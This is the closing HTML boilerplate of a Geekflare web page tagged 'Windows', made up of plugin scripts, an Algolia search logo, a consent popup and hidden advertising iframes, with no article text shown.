<a class="post-tag-link" href="https://geekflare.com/tag/windows/" data-wpel-link="internal">

<span class="post-tag-text">
Windows </span>

</a>

</li>

</ul>

</div>




</div>







</div>
</div>
</div>

</div>
</div>
</div>
</div>
</main>










<script src="https://geekflare.com/wp-content/plugins/auto-image-alt/js/auto_image_alt.js" id="auto_image_alt-js" type="text/javascript"></script>
<script src="https://geekflare.com/wp-content/plugins/ank-prism-for-wp/out/prism-js.min.js" id="prism-script-js" type="text/javascript"></script>
<script type="text/javascript">window.advads_has_ads = [["44562","ad",null],["45275","ad",null]];

( window.advanced_ads_ready || jQuery( document ).ready ).call( null, function() {if ( window.advanced_ads_pro ) {advanced_ads_pro.process_passive_cb();} else if ( window.console && window.console.log ) {console.log('Advanced Ads Pro: cache-busting can not be initialized');} });</script><script src="https://geekflare.com/wp-content/plugins/perfmatters/vendor/instant-page/instantpage.js" type="module"></script>


<iframe style="display: none;" name="__cmpLocator"></iframe><span class="algolia-autocomplete" style="position: absolute; z-index: 100; display: none; direction: ltr;"><span class="aa-dropdown-menu" style="display: block; left: 0px; right: auto;" role="listbox" id="algolia-autocomplete-listbox-0"><div class="aa-empty" style="display: none;"></div><div class="aa-dataset-1"></div>
  <div class="autocomplete-footer">
	<div class="autocomplete-footer-branding">
	  <a href="#" class="algolia-powered-by-link" title="Algolia">
		<svg width="130" viewBox="0 0 130 18" xmlns="http://www.w3.org/2000/svg">
		  <title>Search by Algolia</title>
		  <defs>
			<linearGradient x1="-36.868%" y1="134.936%" x2="129.432%" y2="-27.7%" id="a">
			  <stop stop-color="#00AEFF" offset="0%"></stop>
			  <stop stop-color="#3369E7" offset="100%"></stop>
			</linearGradient>
		  </defs>
		  <g fill="none" fill-rule="evenodd">
			<path d="M59.399.022h13.299a2.372 2.372 0 0 1 2.377 2.364V15.62a2.372 2.372 0 0 1-2.377 2.364H59.399a2.372 2.372 0 0 1-2.377-2.364V2.381A2.368 2.368 0 0 1 59.399.022z" fill="url(#a)"></path>
			<path d="M66.257 4.56c-2.815 0-5.1 2.272-5.1 5.078 0 2.806 2.284 5.072 5.1 5.072 2.815 0 5.1-2.272 5.1-5.078 0-2.806-2.279-5.072-5.1-5.072zm0 8.652c-1.983 0-3.593-1.602-3.593-3.574 0-1.972 1.61-3.574 3.593-3.574 1.983 0 3.593 1.602 3.593 3.574a3.582 3.582 0 0 1-3.593 3.574zm0-6.418v2.664c0 .076.082.131.153.093l2.377-1.226c.055-.027.071-.093.044-.147a2.96 2.96 0 0 0-2.465-1.487c-.055 0-.11.044-.11.104l.001-.001zm-3.33-1.956l-.312-.311a.783.783 0 0 0-1.106 0l-.372.37a.773.773 0 0 0 0 1.101l.307.305c.049.049.121.038.164-.011.181-.245.378-.479.597-.697.225-.223.455-.42.707-.599.055-.033.06-.109.016-.158h-.001zm5.001-.806v-.616a.781.781 0 0 0-.783-.779h-1.824a.78.78 0 0 0-.783.779v.632c0 .071.066.12.137.104a5.736 5.736 0 0 1 1.588-.223c.52 0 1.035.071 1.534.207a.106.106 0 0 0 .131-.104z" fill="#FFF"></path>
			<path d="M102.162 13.762c0 1.455-.372 2.517-1.123 3.193-.75.676-1.895 1.013-3.44 1.013-.564 0-1.736-.109-2.673-.316l.345-1.689c.783.163 1.819.207 2.361.207.86 0 1.473-.174 1.84-.523.367-.349.548-.866.548-1.553v-.349a6.374 6.374 0 0 1-.838.316 4.151 4.151 0 0 1-1.194.158 4.515 4.515 0 0 1-1.616-.278 3.385 3.385 0 0 1-1.254-.817 3.744 3.744 0 0 1-.811-1.351c-.192-.539-.29-1.504-.29-2.212 0-.665.104-1.498.307-2.054a3.925 3.925 0 0 1 .904-1.433 4.124 4.124 0 0 1 1.441-.926 5.31 5.31 0 0 1 1.945-.365c.696 0 1.337.087 1.961.191a15.86 15.86 0 0 1 1.588.332v8.456h-.001zm-5.954-4.206c0 .893.197 1.885.592 2.299.394.414.904.621 1.528.621.34 0 .663-.049.964-.142a2.75 2.75 0 0 0 .734-.332v-5.29a8.531 8.531 0 0 0-1.413-.18c-.778-.022-1.369.294-1.786.801-.411.507-.619 1.395-.619 2.223zm16.12 0c0 .719-.104 1.264-.318 1.858a4.389 4.389 0 0 1-.904 1.52c-.389.42-.854.746-1.402.975-.548.229-1.391.36-1.813.36-.422-.005-1.26-.125-1.802-.36a4.088 4.088 0 0 1-1.397-.975 4.486 4.486 0 0 1-.909-1.52 5.037 5.037 0 0 1-.329-1.858c0-.719.099-1.411.318-1.999.219-.588.526-1.09.92-1.509.394-.42.865-.741 1.402-.97a4.547 4.547 0 0 1 1.786-.338 4.69 4.69 0 0 1 1.791.338c.548.229 1.019.55 1.402.97.389.42.69.921.909 1.509.23.588.345 1.28.345 1.999h.001zm-2.191.005c0-.921-.203-1.689-.597-2.223-.394-.539-.948-.806-1.654-.806-.707 0-1.26.267-1.654.806-.394.539-.586 1.302-.586 2.223 0 .932.197 1.558.592 2.098.394.545.948.812 1.654.812.707 0 1.26-.272 1.654-.812.394-.545.592-1.166.592-2.098h-.001zm6.962 4.707c-3.511.016-3.511-2.822-3.511-3.274L113.583.926l2.142-.338v10.003c0 .256 0 1.88 1.375 1.885v1.792h-.001zm3.774 0h-2.153V5.072l2.153-.338v9.534zm-1.079-10.542c.718 0 1.304-.578 1.304-1.291 0-.714-.581-1.291-1.304-1.291-.723 0-1.304.578-1.304 1.291 0 .714.586 1.291 1.304 1.291zm6.431 1.013c.707 0 1.304.087 1.786.262.482.174.871.42 1.156.73.285.311.488.735.608 1.182.126.447.186.937.186 1.476v5.481a25.24 25.24 0 0 1-1.495.251c-.668.098-1.419.147-2.251.147a6.829 6.829 0 0 1-1.517-.158 3.213 3.213 0 0 1-1.178-.507 2.455 2.455 0 0 1-.761-.904c-.181-.37-.274-.893-.274-1.438 0-.523.104-.855.307-1.215.208-.36.487-.654.838-.883a3.609 3.609 0 0 1 1.227-.49 7.073 7.073 0 0 1 2.202-.103c.263.027.537.076.833.147v-.349c0-.245-.027-.479-.088-.697a1.486 1.486 0 0 0-.307-.583c-.148-.169-.34-.3-.581-.392a2.536 2.536 0 0 0-.915-.163c-.493 0-.942.06-1.353.131-.411.071-.75.153-1.008.245l-.257-1.749c.268-.093.668-.185 1.183-.278a9.335 9.335 0 0 1 1.66-.142l-.001-.001zm.181 7.731c.657 0 1.145-.038 1.484-.104v-2.168a5.097 5.097 0 0 0-1.978-.104c-.241.033-.46.098-.652.191a1.167 1.167 0 0 0-.466.392c-.121.169-.175.267-.175.523 0 .501.175.79.493.981.323.196.75.289 1.293.289h.001zM84.109 4.794c.707 0 1.304.087 1.786.262.482.174.871.42 1.156.73.29.316.487.735.608 1.182.126.447.186.937.186 1.476v5.481a25.24 25.24 0 0 1-1.495.251c-.668.098-1.419.147-2.251.147a6.829 6.829 0 0 1-1.517-.158 3.213 3.213 0 0 1-1.178-.507 2.455 2.455 0 0 1-.761-.904c-.181-.37-.274-.893-.274-1.438 0-.523.104-.855.307-1.215.208-.36.487-.654.838-.883a3.609 3.609 0 0 1 1.227-.49 7.073 7.073 0 0 1 2.202-.103c.257.027.537.076.833.147v-.349c0-.245-.027-.479-.088-.697a1.486 1.486 0 0 0-.307-.583c-.148-.169-.34-.3-.581-.392a2.536 2.536 0 0 0-.915-.163c-.493 0-.942.06-1.353.131-.411.071-.75.153-1.008.245l-.257-1.749c.268-.093.668-.185 1.183-.278a8.89 8.89 0 0 1 1.66-.142l-.001-.001zm.186 7.736c.657 0 1.145-.038 1.484-.104v-2.168a5.097 5.097 0 0 0-1.978-.104c-.241.033-.46.098-.652.191a1.167 1.167 0 0 0-.466.392c-.121.169-.175.267-.175.523 0 .501.175.79.493.981.318.191.75.289 1.293.289h.001zm8.682 1.738c-3.511.016-3.511-2.822-3.511-3.274L89.461.926l2.142-.338v10.003c0 .256 0 1.88 1.375 1.885v1.792h-.001z" fill="#182359"></path>
			<path d="M5.027 11.025c0 .698-.252 1.246-.757 1.644-.505.397-1.201.596-2.089.596-.888 0-1.615-.138-2.181-.414v-1.214c.358.168.739.301 1.141.397.403.097.778.145 1.125.145.508 0 .884-.097 1.125-.29a.945.945 0 0 0 .363-.779.978.978 0 0 0-.333-.747c-.222-.204-.68-.446-1.375-.725-.716-.29-1.221-.621-1.515-.994-.294-.372-.44-.82-.44-1.343 0-.655.233-1.171.698-1.547.466-.376 1.09-.564 1.875-.564.752 0 1.5.165 2.245.494l-.408 1.047c-.698-.294-1.321-.44-1.869-.44-.415 0-.73.09-.945.271a.89.89 0 0 0-.322.717c0 .204.043.379.129.524.086.145.227.282.424.411.197.129.551.299 1.063.51.577.24.999.464 1.268.671.269.208.466.442.591.704.125.261.188.569.188.924l-.001.002zm3.98 2.24c-.924 0-1.646-.269-2.167-.808-.521-.539-.782-1.281-.782-2.226 0-.97.242-1.733.725-2.288.483-.555 1.148-.833 1.993-.833.784 0 1.404.238 1.858.714.455.476.682 1.132.682 1.966v.682H7.357c.018.577.174 1.02.467 1.329.294.31.707.465 1.241.465.351 0 .678-.033.98-.099a5.1 5.1 0 0 0 .975-.33v1.026a3.865 3.865 0 0 1-.935.312 5.723 5.723 0 0 1-1.08.091l.002-.001zm-.231-5.199c-.401 0-.722.127-.964.381s-.386.625-.432 1.112h2.696c-.007-.491-.125-.862-.354-1.115-.229-.252-.544-.379-.945-.379l-.001.001zm7.692 5.092l-.252-.827h-.043c-.286.362-.575.608-.865.739-.29.131-.662.196-1.117.196-.584 0-1.039-.158-1.367-.473-.328-.315-.491-.761-.491-1.337 0-.612.227-1.074.682-1.386.455-.312 1.148-.482 2.079-.51l1.026-.032v-.317c0-.38-.089-.663-.266-.851-.177-.188-.452-.282-.824-.282-.304 0-.596.045-.876.134a6.68 6.68 0 0 0-.806.317l-.408-.902a4.414 4.414 0 0 1 1.058-.384 4.856 4.856 0 0 1 1.085-.132c.756 0 1.326.165 1.711.494.385.329.577.847.577 1.552v4.002h-.902l-.001-.001zm-1.88-.859c.458 0 .826-.128 1.104-.384.278-.256.416-.615.416-1.077v-.516l-.763.032c-.594.021-1.027.121-1.297.298s-.406.448-.406.814c0 .265.079.47.236.615.158.145.394.218.709.218h.001zm7.557-5.189c.254 0 .464.018.628.054l-.124 1.176a2.383 2.383 0 0 0-.559-.064c-.505 0-.914.165-1.227.494-.313.329-.47.757-.47 1.284v3.105h-1.262V7.218h.988l.167 1.047h.064c.197-.354.454-.636.771-.843a1.83 1.83 0 0 1 1.023-.312h.001zm4.125 6.155c-.899 0-1.582-.262-2.049-.787-.467-.525-.701-1.277-.701-2.259 0-.999.244-1.767.733-2.304.489-.537 1.195-.806 2.119-.806.627 0 1.191.116 1.692.349l-.381 1.015c-.534-.208-.974-.312-1.321-.312-1.028 0-1.542.682-1.542 2.046 0 .666.128 1.166.384 1.501.256.335.631.502 1.125.502a3.23 3.23 0 0 0 1.595-.419v1.101a2.53 2.53 0 0 1-.722.285 4.356 4.356 0 0 1-.932.086v.002zm8.277-.107h-1.268V9.506c0-.458-.092-.8-.277-1.026-.184-.226-.477-.338-.878-.338-.53 0-.919.158-1.168.475-.249.317-.373.848-.373 1.593v2.949h-1.262V4.801h1.262v2.122c0 .34-.021.704-.064 1.09h.081a1.76 1.76 0 0 1 .717-.666c.306-.158.663-.236 1.072-.236 1.439 0 2.159.725 2.159 2.175v3.873l-.001-.001zm7.649-6.048c.741 0 1.319.269 1.732.806.414.537.62 1.291.62 2.261 0 .974-.209 1.732-.628 2.275-.419.542-1.001.814-1.746.814-.752 0-1.336-.27-1.751-.811h-.086l-.231.704h-.945V4.801h1.262v1.987l-.021.655-.032.553h.054c.401-.591.992-.886 1.772-.886zm-.328 1.031c-.508 0-.875.149-1.098.448-.224.299-.339.799-.346 1.501v.086c0 .723.115 1.247.344 1.571.229.324.603.486 1.123.486.448 0 .787-.177 1.018-.532.231-.354.346-.867.346-1.536 0-1.35-.462-2.025-1.386-2.025l-.001.001zm3.244-.924h1.375l1.209 3.368c.183.48.304.931.365 1.354h.043c.032-.197.091-.436.177-.717.086-.281.541-1.616 1.364-4.004h1.364l-2.541 6.73c-.462 1.235-1.232 1.853-2.31 1.853-.279 0-.551-.03-.816-.091v-.999c.19.043.406.064.65.064.609 0 1.037-.353 1.284-1.058l.22-.559-2.385-5.941h.001z" fill="#1D3657"></path>
		  </g>
		</svg>
	  </a>
	</div>
  </div>
</span></span><div class="app_gdpr--2k2uB"><div class="popup_popup--1TXMW" style="display: none;"><div class="popup_overlay--2rgA3"></div><div class="popup_content--2JBXA"><div class="details_details--3oWod"><div class="details_body--31iMA"><div class="summary_summary--39BrN"><div class="details_title--3NjQA">Learn more about how information is being used?</div><div class="details_description--2fo80">We and select companies may access and use your information for the below purposes. You may customize your choices below or continue using our site if you're OK with the purposes.</div><div class="summary_purposeItems--1gHBj"></div><div class="details_title--3NjQA">Who is using this information?</div><div class="details_description--2fo80">We and pre-selected companies will use your information. You can see each company in the links above or <a>see the complete list here.</a></div><div class="details_title--3NjQA">What information is being used?</div><div class="details_description--2fo80">Different companies use different information, <a>see the complete list here.</a></div></div></div><div class="details_footer--1oDeu"><button class="button_button--lgX0P details_save--1ja7w ">Continue Using Site</button></div></div></div></div></div><iframe style="display: none;" src="https://aax-eu.amazon-adsystem.com/s/iu3?cm3ppd=1&amp;d=dtb-pub&amp;csif=t&amp;dl=oath_r1u_cnv"></iframe></body><iframe sandbox="allow-scripts allow-same-origin" id="375cf2fe6a7b51d8" allowtransparency="true" marginheight="0" marginwidth="0" hspace="0" vspace="0" style="height:0px;width:0px;display:none;" scrolling="no" src="https://sync.rtk.io/cs" width="0" height="0" frameborder="0">
    </iframe><iframe sandbox="allow-scripts allow-same-origin" id="38f2ca19ad25adc" allowtransparency="true" marginheight="0" marginwidth="0" hspace="0" vspace="0" style="height:0px;width:0px;display:none;" scrolling="no" src="https://ad-cdn.technoratimedia.com/html/usersync.html?src=prebid_prebid_3.27.0" width="0" height="0" frameborder="0">
    </iframe></html>